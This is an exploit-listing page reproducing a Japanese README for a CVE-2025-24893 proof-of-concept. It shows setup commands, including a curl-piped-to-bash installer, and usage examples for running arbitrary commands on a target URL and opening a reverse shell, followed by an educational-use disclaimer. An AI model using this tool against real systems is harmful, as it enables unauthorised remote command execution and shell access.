Sploitus

Exploit for CVE-2025-24893-POC

kitploit · 2026-09-12

Exploit Code

MARKDOWN54 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TH3GL0W-CVE-2025-24893-POC
# CVE-2025-24893

bun をインストール:

root@kitploit:~
    
    
    curl -fsSL https://bun.com/install | bash
    

依存関係をインストールするには:

root@kitploit:~
    
    
    bun install
    

実行するには:

root@kitploit:~
    
    
    bun run CVE-2025-24893.ts
    

このプロジェクトは bun v1.2.19 の `bun init` を使用して作成されました。Bun は高速なオールインワン JavaScript ランタイムです。

## 使い方

root@kitploit:~
    
    
    Usage: bun CVE-2025-24893.ts [options]
    
    Options:
      -u, --url <url>           The target URL to interact with.
      -i, --ip <ip-address>     The IP address for a reverse shell connection.
      -p, --port <port-number>  The port number for the reverse shell.
      -r, --rverse              Open a reverse shell connection.
      -c, --cmd <command>       Execute a specific command.
    
    Examples:
      # Execute a command on a target URL
      bun CVE-2025-24893.ts --url http://example.com --cmd "ls -la"
    
      # Open a reverse shell
      bun CVE-2025-24893.ts --rverse --ip 127.0.0.1 --port 4444
    

## 免責事項

このエクスプロイトとガイドは教育目的のみで提供されています。この情報は責任を持って使用し、明示的にテストの許可を得たシステムでのみ使用してください。無断でシステムを悪用することは違法かつ非倫理的です。著者および貢献者は、この情報によって生じた誤用や損害について一切の責任を負いません。